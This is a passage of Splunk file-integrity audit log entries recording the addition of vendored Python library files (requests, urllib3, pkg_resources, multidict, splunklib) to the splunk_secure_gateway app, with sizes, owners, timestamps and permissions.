hash=] Audit:[timestamp=10-06-2022 17:42:30.491, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests/status_codes.py", isdir=0, size=4188, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.486, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests/sessions.py", isdir=0, size=30137, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.480, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests/packages.py", isdir=0, size=542, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.476, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests/models.py", isdir=0, size=34308, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.472, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests/hooks.py", isdir=0, size=757, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.468, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests/help.py", isdir=0, size=3515, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.463, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests/exceptions.py", isdir=0, size=3161, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.458, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests/cookies.py", isdir=0, size=18430, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.454, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests/compat.py", isdir=0, size=1782, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.450, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests/certs.py", isdir=0, size=453, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.444, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests/auth.py", isdir=0, size=10207, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.439, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests/api.py", isdir=0, size=6496, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.433, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests/adapters.py", isdir=0, size=21344, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.426, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests/_internal_utils.py", isdir=0, size=1096, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.420, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests/__version__.py", isdir=0, size=441, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.416, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests/__init__.py", isdir=0, size=4141, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.310, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/contrib/_securetransport/low_level.py", isdir=0, size=13908, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.307, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/contrib/_securetransport/bindings.py", isdir=0, size=17637, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.303, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/contrib/_securetransport/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.196, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/contrib/socks.py", isdir=0, size=7097, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.192, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/contrib/securetransport.py", isdir=0, size=34286, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.189, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/contrib/pyopenssl.py", isdir=0, size=16778, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.185, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/contrib/ntlmpool.py", isdir=0, size=4160, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.181, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/contrib/appengine.py", isdir=0, size=11010, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.177, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/contrib/_securetransport", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:30.174, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/contrib/_appengine_environ.py", isdir=0, size=957, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.170, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/contrib/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.167, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/util/wait.py", isdir=0, size=5404, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.163, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/util/url.py", isdir=0, size=13964, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.159, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/util/timeout.py", isdir=0, size=10003, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.155, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/util/ssltransport.py", isdir=0, size=6908, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.151, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/util/ssl_.py", isdir=0, size=16269, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.147, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/util/retry.py", isdir=0, size=21396, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.142, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/util/response.py", isdir=0, size=3510, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.138, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/util/request.py", isdir=0, size=4123, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.134, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/util/queue.py", isdir=0, size=498, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.130, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/util/proxy.py", isdir=0, size=1604, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.127, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/util/connection.py", isdir=0, size=4910, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.121, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/util/__init__.py", isdir=0, size=1155, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.016, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/packages/backports/makefile.py", isdir=0, size=1417, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.011, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/packages/backports/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.906, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/packages/ssl_match_hostname/_implementation.py", isdir=0, size=5679, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.902, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/packages/ssl_match_hostname/__init__.py", isdir=0, size=757, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.897, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/packages/ssl_match_hostname", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:29.893, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/packages/six.py", isdir=0, size=32536, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.889, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/packages/backports", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:29.884, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/packages/__init__.py", isdir=0, size=108, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.879, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/util", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:29.876, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/response.py", isdir=0, size=28203, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.871, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/request.py", isdir=0, size=5985, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.867, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/poolmanager.py", isdir=0, size=19763, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.862, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/packages", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:29.858, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/filepost.py", isdir=0, size=2440, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.852, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/fields.py", isdir=0, size=8579, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.847, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/exceptions.py", isdir=0, size=8217, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.843, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/contrib", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:29.839, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/connectionpool.py", isdir=0, size=37133, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.835, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/connection.py", isdir=0, size=18748, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.832, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/_version.py", isdir=0, size=63, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.828, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/_collections.py", isdir=0, size=10811, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.824, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3/__init__.py", isdir=0, size=2763, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.719, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/extern/__init__.py", isdir=0, size=2222, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.714, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/tests/data/my-test-package-source/setup.py", isdir=0, size=104, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.608, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/tests/data/my-test-package-source", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:29.605, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/tests/data", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:29.600, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/_vendor/packaging/version.py", isdir=0, size=15470, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.595, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/_vendor/packaging/utils.py", isdir=0, size=1811, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.591, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/_vendor/packaging/tags.py", isdir=0, size=24067, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.586, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/_vendor/packaging/specifiers.py", isdir=0, size=31944, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.581, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/_vendor/packaging/requirements.py", isdir=0, size=4929, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.577, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/_vendor/packaging/markers.py", isdir=0, size=9518, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.573, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/_vendor/packaging/_typing.py", isdir=0, size=1812, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.568, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/_vendor/packaging/_structures.py", isdir=0, size=2022, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.564, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/_vendor/packaging/_compat.py", isdir=0, size=1128, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.559, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/_vendor/packaging/__init__.py", isdir=0, size=562, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.554, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/_vendor/packaging/__about__.py", isdir=0, size=736, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.448, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/_vendor/pyparsing.py", isdir=0, size=232055, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.443, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/_vendor/packaging", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:29.438, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/_vendor/appdirs.py", isdir=0, size=24701, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.431, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/_vendor/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.409, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/tests", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:29.404, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/extern", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:29.400, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/_vendor", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:29.396, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources/__init__.py", isdir=0, size=108202, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.391, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict/_multilib/views.h", isdir=0, size=12571, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.386, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict/_multilib/pair_list.h", isdir=0, size=27010, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.381, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict/_multilib/iter.h", isdir=0, size=6063, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.375, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict/_multilib/istr.h", isdir=0, size=1914, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.369, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict/_multilib/dict.h", isdir=0, size=368, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.361, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict/_multilib/defs.h", isdir=0, size=627, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.253, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict/__pycache__/_multidict_base.cpython-37.pyc", isdir=0, size=3603, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:29.249, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict/__pycache__/_compat.cpython-37.pyc", isdir=0, size=468, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:29.245, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict/__pycache__/_abc.cpython-37.pyc", isdir=0, size=1953, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:29.241, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict/__pycache__/__init__.cpython-37.pyc", isdir=0, size=839, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:29.237, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict/py.typed", isdir=0, size=15, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.233, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict/_multilib", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:29.229, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict/_multidict_py.py", isdir=0, size=14703, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.226, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict/_multidict_base.py", isdir=0, size=3791, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.222, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict/_multidict.cpython-37m-x86_64-linux-gnu.so", isdir=0, size=374712, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.217, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict/_multidict.c", isdir=0, size=40881, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.214, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict/_compat.py", isdir=0, size=363, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.209, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict/_abc.py", isdir=0, size=1190, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.206, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:29.201, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict/__init__.pyi", isdir=0, size=4931, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.197, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict/__init__.py", isdir=0, size=942, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.093, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/searchcommands/validators.py", isdir=0, size=11877, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.089, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/searchcommands/streaming_command.py", isdir=0, size=6778, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.085, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/searchcommands/search_command.py", 